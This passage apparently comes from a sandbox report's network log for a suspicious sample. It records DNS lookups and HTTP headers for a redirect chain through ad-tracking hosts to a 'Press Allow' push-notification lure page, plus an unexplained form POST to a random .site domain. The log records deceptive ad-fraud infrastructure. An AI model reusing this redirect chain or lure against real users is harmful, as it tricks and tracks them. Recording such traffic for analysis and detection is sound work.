                                                                                          Access-Control-Allow-Origin: *
                                                                                          Access-Control-Allow-Credentials: true
                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                          Access-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding
                                                                                          Pragma: no-cache
                                                                                          Cache-Control: no-transform, no-store, no-cache, must-revalidate, max-age=0
                                                                                          Expires: Tue, 11 Jan 1994 10:00:00 GMT
                                                                                          Timing-Allow-Origin: *
                                                                                          Set-Cookie: OAID=3819b934f4054333861a9d6dc9a564e4; expires=Sat, 09 Jul 2022 23:28:59 GMT; path=/
                                                                                          Set-Cookie: oaidts=1625872378; expires=Sat, 09 Jul 2022 23:28:59 GMT; path=/
                                                                                          Strict-Transport-Security: max-age=1
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Timing-Allow-Origin: *
                                                                                          Content-Encoding: gzip
                                                                                        • POST
                                                                                          http://vexacion.com/?z=1294231&syncedCookie=false
                                                                                          Request
                                                                                          POST /?z=1294231&syncedCookie=false HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Referer: http://vexacion.com/afu.php?zoneid=1294231&var=1294231&rid=3V3cJ5LEtuPAKYxz6tD_Kw%3D%3D
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: vexacion.com
                                                                                          Content-Length: 536
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: OAID=3819b934f4054333861a9d6dc9a564e4; oaidts=1625872378; syncedCookie=true
                                                                                          Response
                                                                                          HTTP/1.1 302 Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:28:57 GMT
                                                                                          Content-Length: 0
                                                                                          Connection: keep-alive
                                                                                          X-Trace-Id: 9055f2bb22f8d8e6b6b23bf81a0dd7b9
                                                                                          Link: <https://myactualblog.com>; rel="preconnect dns-prefetch",<https://propeller-tracking.com>; rel="preconnect dns-prefetch"
                                                                                          Referrer-Policy: no-referrer
                                                                                          Location: https://myactualblog.com/?s=437507092824204040&ssk=4e08a72f5dc9783aca72b61635530df2&svar=1625873340&z=1294231&pz=2660706&tb=4311621&l=2RIeE0GOb7s2Sio
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Access-Control-Allow-Credentials: true
                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                          Access-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding
                                                                                          Pragma: no-cache
                                                                                          Cache-Control: no-transform, no-store, no-cache, must-revalidate, max-age=0
                                                                                          Expires: Tue, 11 Jan 1994 10:00:00 GMT
                                                                                          Timing-Allow-Origin: *
                                                                                          Set-Cookie: OAID=3819b934f4054333861a9d6dc9a564e4; expires=Sat, 09 Jul 2022 23:29:00 GMT; path=/
                                                                                          Set-Cookie: oaidts=1625872378; expires=Sat, 09 Jul 2022 23:29:00 GMT; path=/
                                                                                          Strict-Transport-Security: max-age=1
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Timing-Allow-Origin: *
                                                                                        • DNS
                                                                                          my.rtmark.net
                                                                                          Request
                                                                                          my.rtmark.net
                                                                                          IN A
                                                                                          Response
                                                                                          my.rtmark.net
                                                                                          IN A
                                                                                          139.45.195.8
                                                                                        • POST
                                                                                          https://my.rtmark.net/img.gif?f=merge&userId=3819b934f4054333861a9d6dc9a564e4
                                                                                          Request
                                                                                          POST /img.gif?f=merge&userId=3819b934f4054333861a9d6dc9a564e4 HTTP/2.0
                                                                                          host: my.rtmark.net
                                                                                          origin: http://vexacion.com
                                                                                          referer: http://vexacion.com/afu.php?id=1294231
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          content-type: text/plain;charset=UTF-8
                                                                                          accept-language: en-US
                                                                                          accept: */*
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          content-length: 0
                                                                                          cache-control: no-cache
                                                                                          cookie: ID=3819b934f4054333861a9d6dc9a564e4
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          server: nginx
                                                                                          date: Fri, 09 Jul 2021 23:28:57 GMT
                                                                                          content-type: image/gif
                                                                                          content-length: 43
                                                                                          access-control-allow-origin: http://vexacion.com
                                                                                          access-control-allow-methods: POST, GET, OPTIONS, PUT, DELETE
                                                                                          access-control-allow-headers: Accept, Content-Type, Content-Length, Accept-Encoding, Authorization,X-CSRF-Token
                                                                                          access-control-expose-headers: Authorization
                                                                                          access-control-allow-credentials: true
                                                                                          timing-allow-origin: *
                                                                                          set-cookie: ID=3819b934f4054333861a9d6dc9a564e4; expires=Sat, 09 Jul 2022 23:29:00 GMT; secure; SameSite=None
                                                                                          strict-transport-security: max-age=1
                                                                                          x-content-type-options: nosniff
                                                                                          timing-allow-origin: *
                                                                                        • POST
                                                                                          https://my.rtmark.net/img.gif?f=merge&userId=1d8bfbc63e5c4ffb8c9d64deb7ba5fb9
                                                                                          Request
                                                                                          POST /img.gif?f=merge&userId=1d8bfbc63e5c4ffb8c9d64deb7ba5fb9 HTTP/2.0
                                                                                          host: my.rtmark.net
                                                                                          origin: https://jeehathu.com
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          content-type: text/plain;charset=UTF-8
                                                                                          accept-language: en-US
                                                                                          accept: */*
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          content-length: 0
                                                                                          cache-control: no-cache
                                                                                          cookie: ID=3819b934f4054333861a9d6dc9a564e4
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          server: nginx
                                                                                          date: Fri, 09 Jul 2021 23:29:00 GMT
                                                                                          content-type: image/gif
                                                                                          content-length: 43
                                                                                          access-control-allow-origin: https://jeehathu.com
                                                                                          access-control-allow-methods: POST, GET, OPTIONS, PUT, DELETE
                                                                                          access-control-allow-headers: Accept, Content-Type, Content-Length, Accept-Encoding, Authorization,X-CSRF-Token
                                                                                          access-control-expose-headers: Authorization
                                                                                          access-control-allow-credentials: true
                                                                                          timing-allow-origin: *
                                                                                          set-cookie: ID=3819b934f4054333861a9d6dc9a564e4; expires=Sat, 09 Jul 2022 23:29:03 GMT; secure; SameSite=None
                                                                                          strict-transport-security: max-age=1
                                                                                          x-content-type-options: nosniff
                                                                                          timing-allow-origin: *
                                                                                        • POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Cache-Control: no-cache
                                                                                          Connection: Keep-Alive
                                                                                          Pragma: no-cache
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 1211
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:29:00 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 433
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • DNS
                                                                                          myactualblog.com
                                                                                          Request
                                                                                          myactualblog.com
                                                                                          IN A
                                                                                          Response
                                                                                          myactualblog.com
                                                                                          IN A
                                                                                          139.45.197.170
                                                                                        • GET
                                                                                          https://myactualblog.com/templates/_assets/push-skin/skin.css
                                                                                          Request
                                                                                          GET /templates/_assets/push-skin/skin.css HTTP/1.1
                                                                                          Accept: text/css, */*
                                                                                          Referer: https://myactualblog.com/templates/_assets/push-skin/skin.html
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: myactualblog.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: reverse=JP4IM21Bn2n8JA638yOEb-isNNhSQ2M0u_V41ahXxz4
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:29:01 GMT
                                                                                          Content-Type: text/css
                                                                                          Last-Modified: Fri, 09 Jul 2021 15:12:16 GMT
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          ETag: W/"60e86750-5cf1"
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS, HEAD
                                                                                          Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Content-Range,Range
                                                                                          Access-Control-Expose-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Content-Range,Range
                                                                                          Content-Encoding: gzip
                                                                                        • GET
                                                                                          https://myactualblog.com/templates/_assets/push-skin/skin.min.js
                                                                                          Request
                                                                                          GET /templates/_assets/push-skin/skin.min.js HTTP/1.1
                                                                                          Accept: application/javascript, */*;q=0.8
                                                                                          Referer: https://myactualblog.com/templates/_assets/push-skin/skin.html
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: myactualblog.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: reverse=JP4IM21Bn2n8JA638yOEb-isNNhSQ2M0u_V41ahXxz4
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:29:01 GMT
                                                                                          Content-Type: application/javascript
                                                                                          Last-Modified: Fri, 09 Jul 2021 15:12:16 GMT
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          ETag: W/"60e86750-6d48"
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS, HEAD
                                                                                          Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Content-Range,Range
                                                                                          Access-Control-Expose-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Content-Range,Range
                                                                                          Content-Encoding: gzip
                                                                                        • GET
                                                                                          https://myactualblog.com/?s=437507092824204040&ssk=4e08a72f5dc9783aca72b61635530df2&svar=1625873340&z=1294231&pz=2660706&tb=4311621&l=2RIeE0GOb7s2Sio
                                                                                          Request
                                                                                          GET /?s=437507092824204040&ssk=4e08a72f5dc9783aca72b61635530df2&svar=1625873340&z=1294231&pz=2660706&tb=4311621&l=2RIeE0GOb7s2Sio HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Referer: http://vexacion.com/afu.php?zoneid=1294231&var=1294231&rid=3V3cJ5LEtuPAKYxz6tD_Kw%3D%3D
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: myactualblog.com
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:29:00 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          X-Powered-By: PHP/7.4.18
                                                                                          Set-Cookie: reverse=JP4IM21Bn2n8JA638yOEb-isNNhSQ2M0u_V41ahXxz4; expires=Sat, 10-Jul-2021 00:29:00 GMT; Max-Age=3600; path=/
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS, HEAD
                                                                                          Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Content-Range,Range
                                                                                          Access-Control-Expose-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Content-Range,Range
                                                                                          Content-Encoding: gzip
                                                                                        • GET
                                                                                          https://myactualblog.com/templates/_assets/push-skin/skin.html
                                                                                          Request
                                                                                          GET /templates/_assets/push-skin/skin.html HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Referer: https://myactualblog.com/?s=437507092824204040&ssk=4e08a72f5dc9783aca72b61635530df2&svar=1625873340&z=1294231&pz=2660706&tb=4311621&l=2RIeE0GOb7s2Sio
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: myactualblog.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: reverse=JP4IM21Bn2n8JA638yOEb-isNNhSQ2M0u_V41ahXxz4
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:29:00 GMT
                                                                                          Content-Type: text/html
                                                                                          Last-Modified: Fri, 09 Jul 2021 15:12:16 GMT
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          ETag: W/"60e86750-a84"
                                                                                          Strict-Transport-Security: max-age=60
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Content-Encoding: gzip
                                                                                        • POST
                                                                                          https://myactualblog.com/?s=437507092824204040&ssk=4e08a72f5dc9783aca72b61635530df2&svar=1625873340&z=1294231&pz=2660706&tb=4311621&l=2RIeE0GOb7s2Sio&mprtr=1
                                                                                          Request
                                                                                          POST /?s=437507092824204040&ssk=4e08a72f5dc9783aca72b61635530df2&svar=1625873340&z=1294231&pz=2660706&tb=4311621&l=2RIeE0GOb7s2Sio&mprtr=1 HTTP/1.1
                                                                                          Accept: */*
                                                                                          Origin: https://myactualblog.com
                                                                                          Referer: https://myactualblog.com/?s=437507092824204040&ssk=4e08a72f5dc9783aca72b61635530df2&svar=1625873340&z=1294231&pz=2660706&tb=4311621&l=2RIeE0GOb7s2Sio
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: myactualblog.com
                                                                                          Content-Length: 0
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: reverse=JP4IM21Bn2n8JA638yOEb-isNNhSQ2M0u_V41ahXxz4
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:29:01 GMT
                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          X-Powered-By: PHP/7.4.18
                                                                                          Access-Control-Allow-Credentials: true
                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                          Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type
                                                                                          Content-Encoding: gzip
                                                                                        • DNS
                                                                                          littlecdn.com
                                                                                          Request
                                                                                          littlecdn.com
                                                                                          IN A
                                                                                          Response
                                                                                          littlecdn.com
                                                                                          IN A
                                                                                          104.22.25.116
                                                                                          littlecdn.com
                                                                                          IN A
                                                                                          172.67.10.98
                                                                                          littlecdn.com
                                                                                          IN A
                                                                                          104.22.24.116
                                                                                        • DNS
                                                                                          propeller-tracking.com
                                                                                          Request
                                                                                          propeller-tracking.com
                                                                                          IN A
                                                                                          Response
                                                                                          propeller-tracking.com
                                                                                          IN A
                                                                                          139.45.197.240
                                                                                        • GET
                                                                                          https://littlecdn.com/apps/templates/_assets/scripts/inapp.min.js
                                                                                          Request
                                                                                          GET /apps/templates/_assets/scripts/inapp.min.js HTTP/2.0
                                                                                          host: littlecdn.com
                                                                                          accept: application/javascript, */*;q=0.8
                                                                                          referer: https://myactualblog.com/?s=437507092824204040&ssk=4e08a72f5dc9783aca72b61635530df2&svar=1625873340&z=1294231&pz=2660706&tb=4311621&l=2RIeE0GOb7s2Sio
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:29:00 GMT
                                                                                          content-type: application/javascript
                                                                                          last-modified: Fri, 09 Jul 2021 15:12:16 GMT
                                                                                          vary: Accept-Encoding
                                                                                          etag: W/"60e86750-54ed"
                                                                                          access-control-allow-origin: *
                                                                                          access-control-allow-methods: GET, POST, OPTIONS, HEAD
                                                                                          access-control-allow-headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Content-Range,Range
                                                                                          access-control-expose-headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Content-Range,Range
                                                                                          cache-control: max-age=14400
                                                                                          cf-cache-status: HIT
                                                                                          age: 4726
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c554fc5c861e91-AMS
                                                                                          content-encoding: br
                                                                                        • DNS
                                                                                          mc.yandex.ru
                                                                                          Request
                                                                                          mc.yandex.ru
                                                                                          IN A
                                                                                          Response
                                                                                          mc.yandex.ru
                                                                                          IN A
                                                                                          87.250.250.119
                                                                                          mc.yandex.ru
                                                                                          IN A
                                                                                          93.158.134.119
                                                                                          mc.yandex.ru
                                                                                          IN A
                                                                                          77.88.21.119
                                                                                          mc.yandex.ru
                                                                                          IN A
                                                                                          87.250.251.119
                                                                                        • GET
                                                                                          https://mc.yandex.ru/metrika/tag.js
                                                                                          Request
                                                                                          GET /metrika/tag.js HTTP/2.0
                                                                                          host: mc.yandex.ru
                                                                                          accept: application/javascript, */*;q=0.8
                                                                                          referer: https://myactualblog.com/?s=437507092824204040&ssk=4e08a72f5dc9783aca72b61635530df2&svar=1625873340&z=1294231&pz=2660706&tb=4311621&l=2RIeE0GOb7s2Sio
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          content-length: 71884
                                                                                          date: Fri, 09 Jul 2021 23:29:01 GMT
                                                                                          access-control-allow-origin: *
                                                                                          etag: "60dc7bb1-118cc"
                                                                                          expires: Sat, 10 Jul 2021 00:29:01 GMT
                                                                                          last-modified: Fri, 09 Jul 2021 11:53:50 GMT
                                                                                          cache-control: max-age=3600
                                                                                          content-encoding: br
                                                                                          content-type: application/javascript
                                                                                          strict-transport-security: max-age=31536000
                                                                                        • DNS
                                                                                          Response
                                                                                          HTTP/2.0 302
                                                                                          location: /watch/78269050/1?wmode=7&page-url=https%3A%2F%2Fmyactualblog.com%2F%3Fs%3D437507092824204040%26ssk%3D4e08a72f5dc9783aca72b61635530df2%26svar%3D1625873340%26z%3D1294231%26pz%3D2660706%26tb%3D4311621%26l%3D2RIeE0GOb7s2Sio&charset=utf-8&browser-info=pv%3A1%3Agdpr%3A14%3Avf%3A2fhsb6k71knxmy9rf%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A581%3Acn%3A1%3Adp%3A0%3Als%3A98383200869%3Ahid%3A16932263%3Az%3A0%3Ai%3A202107010012524%3Aet%3A1625880324%3Ac%3A1%3Arn%3A195069367%3Arqn%3A1%3Au%3A1625880324636635977%3Aw%3A800x555%3As%3A1280x720x24%3Ask%3A1%3Aj%3A1%3Ans%3A1625880322165%3Ads%3A0%2C0%2C45%2C6%2C340%2C0%2C%2C255%2C0%2C%2C%2C%2C925%3Adsn%3A0%2C0%2C46%2C5%2C341%2C0%2C%2C250%2C1%2C%2C%2C%2C925%3Awv%3A2%3Arqnl%3A1%3Ati%3A2%3Ast%3A1625880324%3At%3APress%20Allow
                                                                                          date: Fri, 09 Jul 2021 23:29:02 GMT
                                                                                          access-control-allow-origin: https://myactualblog.com
                                                                                          set-cookie: yandexuid=6336696301625873342; Expires=Sat, 09-Jul-2022 23:29:02 GMT; Domain=.yandex.ru; Path=/
                                                                                          set-cookie: yabs-sid=2408038311625873342; Path=/
                                                                                          set-cookie: i=rSWOtPWXO93Hebj26ICiWQqed39NjMfbdUGJmCWgTuIPpz21D162kpVuKHdqm8c4noJf9U2MeN562Ua2hX9t+mAZ1Jc=; Expires=Mon, 07-Jul-2031 23:28:59 GMT; Domain=.yandex.ru; Path=/; Secure; HttpOnly
                                                                                          set-cookie: ymex=1657409342.yrts.1625873342#1657409342.yrtsi.1625873342; Expires=Sat, 09-Jul-2022 23:29:02 GMT; Domain=.yandex.ru; Path=/
                                                                                          access-control-allow-credentials: true
                                                                                          pragma: no-cache
                                                                                          x-xss-protection: 1; mode=block
                                                                                          expires: Fri, 09-Jul-2021 23:29:02 GMT
                                                                                          last-modified: Fri, 09-Jul-2021 23:29:02 GMT
                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                          strict-transport-security: max-age=31536000
                                                                                        • DNS
                                                                                          Response
                                                                                          HTTP/2.0 302
                                                                                          location: /watch/67238875/1?wmode=7&page-url=https%3A%2F%2Fmyactualblog.com%2F%3Fs%3D437507092824204040%26ssk%3D4e08a72f5dc9783aca72b61635530df2%26svar%3D1625873340%26z%3D1294231%26pz%3D2660706%26tb%3D4311621%26l%3D2RIeE0GOb7s2Sio&charset=utf-8&browser-info=pv%3A1%3Agdpr%3A14%3Avf%3A2fhsb6k71knxmy9rf%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A581%3Acn%3A2%3Adp%3A0%3Als%3A940436807676%3Ahid%3A16932263%3Az%3A0%3Ai%3A202107010012524%3Aet%3A1625880324%3Ac%3A1%3Arn%3A685046871%3Arqn%3A1%3Au%3A1625880324636635977%3Aw%3A800x555%3As%3A1280x720x24%3Ask%3A1%3Aj%3A1%3Ans%3A1625880322165%3Ads%3A0%2C0%2C45%2C6%2C340%2C0%2C%2C255%2C0%2C%2C%2C%2C925%3Adsn%3A0%2C0%2C46%2C5%2C341%2C0%2C%2C250%2C1%2C%2C%2C%2C925%3Awv%3A2%3Arqnl%3A1%3Ati%3A2%3Ast%3A1625880324%3At%3APress%20Allow
                                                                                          date: Fri, 09 Jul 2021 23:29:02 GMT
                                                                                          access-control-allow-origin: https://myactualblog.com
                                                                                          set-cookie: yandexuid=4592527301625873342; Expires=Sat, 09-Jul-2022 23:29:02 GMT; Domain=.yandex.ru; Path=/
                                                                                          set-cookie: yabs-sid=2649150231625873342; Path=/
                                                                                          set-cookie: i=gC37a7UKhvUM1xkwXtEpppImNbAywBcA0reluxmM/t+4vZ+t2+BB78sZ7XJ60XShEFqR7N0Imx5yyziRsvfxPJGZ9qA=; Expires=Mon, 07-Jul-2031 23:28:59 GMT; Domain=.yandex.ru; Path=/; Secure; HttpOnly
                                                                                          set-cookie: ymex=1657409342.yrts.1625873342#1657409342.yrtsi.1625873342; Expires=Sat, 09-Jul-2022 23:29:02 GMT; Domain=.yandex.ru; Path=/
                                                                                          access-control-allow-credentials: true
                                                                                          pragma: no-cache
                                                                                          x-xss-protection: 1; mode=block
                                                                                          expires: Fri, 09-Jul-2021 23:29:02 GMT
                                                                                          last-modified: Fri, 09-Jul-2021 23:29:02 GMT
                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                          strict-transport-security: max-age=31536000
                                                                                        • DNS
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          content-length: 316
                                                                                          date: Fri, 09 Jul 2021 23:29:02 GMT
                                                                                          x-content-type-options: nosniff
                                                                                          access-control-allow-origin: https://myactualblog.com
                                                                                          access-control-allow-credentials: true
                                                                                          pragma: no-cache
                                                                                          x-xss-protection: 1; mode=block
                                                                                          expires: Fri, 09-Jul-2021 23:29:02 GMT
                                                                                          last-modified: Fri, 09-Jul-2021 23:29:02 GMT
                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                          content-type: application/json; charset=utf-8
                                                                                          strict-transport-security: max-age=31536000
                                                                                        • DNS
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          content-length: 316
                                                                                          date: Fri, 09 Jul 2021 23:29:02 GMT
                                                                                          x-content-type-options: nosniff
                                                                                          access-control-allow-origin: https://myactualblog.com
                                                                                          access-control-allow-credentials: true
                                                                                          pragma: no-cache
                                                                                          x-xss-protection: 1; mode=block
                                                                                          expires: Fri, 09-Jul-2021 23:29:02 GMT
                                                                                          last-modified: Fri, 09-Jul-2021 23:29:02 GMT
                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                          content-type: application/json; charset=utf-8
                                                                                          strict-transport-security: max-age=31536000
                                                                                        • DNS
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          content-length: 43
                                                                                          date: Fri, 09 Jul 2021 23:29:02 GMT
                                                                                          access-control-allow-origin: *
                                                                                          etag: "60e838ef-2b"
                                                                                          expires: Sat, 10 Jul 2021 00:29:02 GMT
                                                                                          accept-ranges: bytes
                                                                                          last-modified: Fri, 09 Jul 2021 11:53:50 GMT
                                                                                          cache-control: max-age=3600
                                                                                          content-type: image/gif
                                                                                          strict-transport-security: max-age=31536000
                                                                                        • DNS
                                                                                          yonhelioliskor.com
                                                                                          Request
                                                                                          yonhelioliskor.com
                                                                                          IN A
                                                                                          Response
                                                                                          yonhelioliskor.com
                                                                                          IN A
                                                                                          139.45.196.136
                                                                                          yonhelioliskor.com
                                                                                          IN A
                                                                                          139.45.196.208
                                                                                        • GET
                                                                                          https://myactualblog.com/favicon.ico
                                                                                          Request
                                                                                          GET /favicon.ico HTTP/1.1
                                                                                          Accept: */*
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Host: myactualblog.com
                                                                                          DNT: 1
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 204 No Content
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:29:01 GMT
                                                                                          Connection: keep-alive
                                                                                          Strict-Transport-Security: max-age=60
                                                                                          X-Content-Type-Options: nosniff
                                                                                        • DNS
                                                                                          yandex.ocsp-responder.com
                                                                                          Request
                                                                                          yandex.ocsp-responder.com
                                                                                          IN A
                                                                                          Response
                                                                                          yandex.ocsp-responder.com
                                                                                          IN CNAME
                                                                                          cdn.yandex.net
                                                                                          cdn.yandex.net
                                                                                          IN A
                                                                                          5.45.205.241
                                                                                          cdn.yandex.net
                                                                                          IN A
                                                                                          5.45.205.243
                                                                                          cdn.yandex.net
                                                                                          IN A
                                                                                          5.45.205.245
                                                                                          cdn.yandex.net
                                                                                          IN A
                                                                                          5.45.205.242
                                                                                          cdn.yandex.net
                                                                                          IN A
                                                                                          5.45.205.244
                                                                                        • GET
                                                                                          http://yandex.ocsp-responder.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBStniMGfahyWUWDEeSLUFbNR9JLAgQUN1zjGeCyjqGoTtLPq9Dc4wtcNU0CEDbEISBuJVGq0KdX46enAhA%3D
                                                                                          Request
                                                                                          GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBStniMGfahyWUWDEeSLUFbNR9JLAgQUN1zjGeCyjqGoTtLPq9Dc4wtcNU0CEDbEISBuJVGq0KdX46enAhA%3D HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: */*
                                                                                          User-Agent: Microsoft-CryptoAPI/10.0
                                                                                          Host: yandex.ocsp-responder.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx/1.17.9
                                                                                          Date: Fri, 09 Jul 2021 23:29:01 GMT
